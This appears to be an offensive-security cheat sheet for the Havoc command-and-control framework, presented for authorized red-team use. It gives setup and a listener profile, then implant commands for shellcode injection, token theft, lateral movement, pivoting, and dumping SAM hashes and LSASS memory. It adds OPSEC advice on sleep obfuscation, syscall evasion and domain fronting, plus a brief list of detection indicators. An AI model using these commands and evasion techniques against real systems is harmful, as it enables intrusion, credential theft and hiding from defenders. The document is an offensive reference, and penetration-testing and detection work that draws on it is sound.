← All cheat sheets

HAVOC-C2

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Open-source C2 framework focused on evasion with indirect syscalls,
sleep obfuscation, and modern anti-detection techniques.

INSTALLATION & SETUP#

# Clone repository
git clone https://github.com/HavocFramework/Havoc
cd Havoc

# Build teamserver
cd teamserver
go build
# Or: make

# Build client (Qt-based GUI)
cd ../client
make

# Start teamserver
./teamserver server --profile profiles/havoc.yaotl

# Start client
./Havoc

# Default profile location
ls profiles/havoc.yaotl

TEAMSERVER CONFIGURATION#

# havoc.yaotl profile format

Teamserver {
    Host = "0.0.0.0"
    Port = 40056

    Build {
        Compiler64 = "/usr/bin/x86_64-w64-mingw32-gcc"
        Compiler86 = "/usr/bin/i686-w64-mingw32-gcc"
        Nasm = "/usr/bin/nasm"
    }
}

Operators {
    user "operator1" {
        Password = "P@ssw0rd123"
    }
    user "operator2" {
        Password = "An0therP@ss"
    }
}

Listeners {
    Http {
        Name         = "HTTPS Listener"
        KillDate     = "2024-12-31 00:00:00"
        WorkingHours = "8:00-18:00"
        Hosts        = ["cdn.legit.com"]
        HostBind     = "0.0.0.0"
        HostRotation = "round-robin"
        PortBind     = 443
        PortConn     = 443
        Secure       = true
        UserAgent    = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

        Uris = ["/api/v1/data", "/static/js/app.js"]

        Headers = [
            "X-Requested-With: XMLHttpRequest",
            "Content-Type: application/json"
        ]

        Response {
            Headers = [
                "X-Frame-Options: DENY",
                "Content-Type: application/json"
            ]
        }
    }
}

Demon {
    Sleep  = 10
    Jitter = 20

    TrustXForwardedFor = false

    Injection {
        Spawn64 = "C:\\Windows\\System32\\notepad.exe"
        Spawn32 = "C:\\Windows\\SysWOW64\\notepad.exe"
    }
}

LISTENERS#

# Via GUI: Havoc > Listeners > Add

# HTTP/HTTPS Listener
  Name:       Listener name
  Hosts:      Callback domains/IPs
  Port:       Callback port
  Secure:     true for HTTPS
  KillDate:   Agent expiration
  URIs:       Custom callback URIs
  Headers:    Custom HTTP headers

# SMB Listener (for lateral movement)
  Pipe Name:  Custom named pipe

# External C2 Listener
  Endpoint:   Custom protocol handler

DEMON AGENT#

The Demon is Havoc's primary implant (Windows-focused).

Key Features:
  - Position-independent code
  - Indirect syscalls (SSN sorting, syscall address resolution)
  - Sleep obfuscation (Ekko, Zilean, Foliage techniques)
  - AMSI/ETW patching
  - Token manipulation
  - Inline .NET execution
  - BOF (Beacon Object File) support
  - Custom reflective loader
  - Stack spoofing
  - Return address spoofing
  - Module stomping

GENERATING PAYLOADS#

# Via GUI: Havoc > Payloads > Generate

# Payload options
Format:           Windows Exe, Windows Service Exe,
                  Windows DLL, Windows Shellcode, Raw
Architecture:     x64, x86
Listener:         Select configured listener
Sleep Technique:  Ekko, Zilean, Foliage
Indirect Syscall: Enabled/Disabled

# Sleep obfuscation techniques
Ekko:       Timer-based sleep with ROP chain (RtlCreateTimer)
Zilean:     APC-based sleep obfuscation
Foliage:    APC-based with NtApcRoutine

DEMON COMMANDS#

# System Information
demon> whoami                        # Current user
demon> pwd                           # Working directory
demon> dir                           # List directory
demon> cd <path>                     # Change directory
demon> env                           # Environment variables
demon> hostname                      # Machine hostname
demon> ipconfig                      # Network interfaces
demon> ps                            # Process list
demon> cat <file>                    # Read file contents

# File Operations
demon> upload /local/path /remote/path    # Upload file
demon> download C:\path\file              # Download file
demon> cp <src> <dst>                     # Copy file
demon> mv <src> <dst>                     # Move file
demon> rm <file>                          # Delete file
demon> mkdir <dir>                        # Create directory

# Execution
demon> shell whoami                  # Run via cmd.exe
demon> powershell Get-Process        # PowerShell execution
demon> execute-assembly Rubeus.exe args  # .NET in-memory
demon> shellcode inject x64 <pid> /path/to/sc.bin  # Inject shellcode
demon> shellcode spawn x64 /path/to/sc.bin         # Spawn + inject

# BOF Execution
demon> inline-execute /path/to/bof.o arg1 arg2

# Token Manipulation
demon> token steal <pid>             # Steal token from process
demon> token make DOMAIN\user pass   # Create token
demon> token list                    # List tokens
demon> token revert                  # Revert to original token
demon> token remove <token_id>       # Remove token
demon> token getuid                  # Current token user

# Process Injection
demon> inject x64 <pid> /path/to/shellcode.bin
demon> spawn x64 /path/to/shellcode.bin

# Lateral Movement
demon> jump psexec <target> <listener>  # PsExec
demon> jump winrm <target> <listener>   # WinRM
demon> jump wmi <target> <listener>     # WMI

# Pivoting
demon> socks add <port>             # Start SOCKS5 proxy
demon> socks list                    # List proxies
demon> socks kill <port>             # Stop proxy
demon> rportfwd add <lport> <target> <tport>  # Reverse port forward
demon> rportfwd list
demon> rportfwd remove <id>

# Credential Access
demon> hashdump                      # Dump SAM hashes
demon> lsass dump                    # Dump LSASS memory
demon> token steal <pid>             # Steal credentials from process

# Sleep & Jitter
demon> sleep 30                      # Set sleep to 30 seconds
demon> sleep 60 30                   # 60s sleep, 30% jitter

# Process Configuration
demon> config inject spawn64 C:\Windows\System32\svchost.exe
demon> config inject spawn32 C:\Windows\SysWOW64\svchost.exe

# Miscellaneous
demon> screenshot                    # Take screenshot
demon> exit                          # Kill agent
demon> checkin                       # Force check-in

EXTENDING HAVOC#

# BOF Support
  - Havoc supports Cobalt Strike BOFs natively
  - Use inline-execute for BOF execution
  - Compatible with most CS BOF toolkits

# Python API for custom scripts
  - Havoc provides a Python scripting API
  - Scripts placed in scripts/ directory
  - Access to agent tasking, listener management, UI hooks

# Third-party modules
  - Community BOF collections work directly
  - CS-Situational-Awareness-BOF
  - TrustedSec SA BOF
  - InlineWhispers for syscall BOFs

OPSEC CONSIDERATIONS#

  - Use Ekko/Zilean/Foliage sleep obfuscation
  - Indirect syscalls avoid userland hooks
  - Customize spawn-to process (avoid suspicious defaults)
  - Set appropriate sleep intervals and jitter
  - Use HTTPS with valid certificates and domain fronting
  - Customize HTTP profiles (URIs, headers, user agents)
  - Set kill dates on implants
  - Use working hours to limit callback times
  - Use BOFs over fork-and-run for stealth
  - Avoid disk writes; prefer in-memory execution
  - Stack spoofing hides call origin from ETW
  - Rotate infrastructure during engagements

DETECTION INDICATORS#

  - Default named pipes for SMB C2
  - Sleep pattern analysis (even with obfuscation)
  - Indirect syscall patterns (SSN resolution)
  - AMSI/ETW patch detection
  - Process injection events (Event 8, Sysmon)
  - Unusual parent-child process relationships
  - HTTP traffic patterns matching profile defaults
  - In-memory .NET CLR loading
  - Token manipulation events (Event 4624, 4672)

COMPARISON WITH OTHER C2#

Feature           Havoc    Cobalt Strike   Sliver
-------           -----    -------------   ------
License           OSS      Commercial      OSS
Sleep Obfusc.     Yes      Limited         No
Indirect Syscall  Yes      Via BOF         No
BOF Support       Yes      Native          Via armory
.NET Execution    Yes      Yes             Yes
Platforms         Windows  Win/Lin/Mac     All
SOCKS Proxy       Yes      Yes             Yes
GUI               Qt       Java            CLI
Multiplayer       Yes      Yes             Yes